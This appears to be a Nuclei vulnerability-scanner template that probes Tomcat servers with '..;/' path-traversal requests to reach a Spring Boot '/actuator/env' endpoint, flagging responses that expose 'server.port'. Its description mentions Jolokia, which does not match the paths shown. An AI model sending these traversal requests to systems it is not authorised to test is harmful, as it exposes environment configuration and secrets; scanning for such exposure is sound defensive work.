id: tomcat_headp_dump

info:
  name: Tomcat tomcat_headp_dump
  author: Xand
  severity: medium
  description: Attempts to access sensitive Jolokia endpoints using multiple path traversal variations.
  metadata:
    max-request: 10
  tags: jolokia,tomcat,traversal,exposure

http:
  - method: GET
    path:
      # Normal endpoint
      - "{{BaseURL}}/..;/..;/..;/actuator/env"
      - "{{BaseURL}}/..;/..;/actuator/env"
      - "{{BaseURL}}/..;/actuator/env"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: or
        words:
          - "server.port"
